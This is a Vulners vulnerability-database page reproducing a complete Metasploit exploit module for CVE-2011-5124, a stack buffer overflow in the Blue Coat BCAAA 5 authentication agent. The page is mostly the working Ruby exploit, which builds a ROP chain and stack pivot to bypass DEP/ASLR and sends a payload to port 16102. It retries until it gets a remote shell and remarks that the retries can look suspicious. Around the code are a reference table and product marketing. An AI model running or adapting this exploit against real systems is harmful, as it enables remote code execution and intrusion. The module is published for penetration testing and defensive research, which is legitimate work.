Vulners
Lucene search
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
🗓️ 09 Jul 2011 01:40:29Reported by Paul Harrington, Travis Warren, sinn3r <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 31 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2011-5124 | 26 Aug 201219:55 | – | attackerkb |
 | Blue Coat Authentication and Authorization Agent Remote Overflow | 17 Jul 201300:00 | – | nessus |
 | CVE-2011-5124 | 9 Jul 201100:00 | – | circl |
 | CVE-2011-5124 | 26 Aug 201219:00 | – | cve |
 | CVE-2011-5124 | 26 Aug 201219:00 | – | cvelist |
 | CVE-2011-5124 | 26 Aug 201219:55 | – | nvd |
 | Stack overflow | 26 Aug 201219:55 | – | prion |
 | CVE-2011-5124 | 22 May 202501:47 | – | redhatcve |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
which comes as part of the Blue Coat Authentication proxy. Please note that by default,
this exploit will attempt up to three times in order to successfully gain remote code
execution (in some cases, it takes as many as five times). This can cause your activity
to look even more suspicious. To modify the number of exploit attempts, set the
ATTEMPTS option.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Paul Harrington', # Initial discovery and PoC
'Travis Warren', # MSF Module with Universal DEP/ASLR bypass
'sinn3r', # More testing / reliability, plus minor changes
],
'References' =>
[
[ 'CVE', '2011-5124' ],
[ 'OSVDB', '72095'],
[ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
[ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]
],
'Payload' =>
{
'Space' => 936,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BCAAA Version 5.4.6.1.54128', {} ],
],
'Privileged' => false,
'DisclosureDate' => '2011-04-04',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(16102),
OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
])
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
rop_gadgets = [
# rop chain generated with mona.py
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
junk, # EBP (filler)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- *&VirtualProtect()
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
junk, # EDI (filler)
junk, # will be patched at runtime (VP), then picked up into ESI
junk, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffffdff, # size 0x00000201 -> ebx, modify if needed
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack("V*")
pivot = [
0x7C3410C4, # RETN (MSVCR71.dll)
0x1003800C, # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
0x4241467D, # EBP
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C3417D2, # SUB EAX,EAX; RETN (MSVCR71.dll)
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C34f6C2, # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
junk, # EBX
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x5D02D0A0, # SUB EBP,EAX; RETN (MSVCR70.dll)
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C3B5080, # XCHG EAX,ESP; RETN (MSVCP71.dll)
].pack("V*")
attempts = datastore['ATTEMPTS']
#Sometimes a few attempts are needed to get a shell back (3 or 5 times)
attempts.times do |i|
#If we have a session on the box already, then we don't continue trying
break if session_created?
buffer = rand_text(8)
buffer << rop_gadgets
buffer << payload.encoded
buffer << 'EBAB'
buffer << rand_text(8)
buffer << pivot
connect
print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")
sock.put(buffer)
handler
select(nil, nil, nil, 2)
disconnect
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
8.3High risk
Vulners AI Score8.3
CVSS 210
EPSS0.70248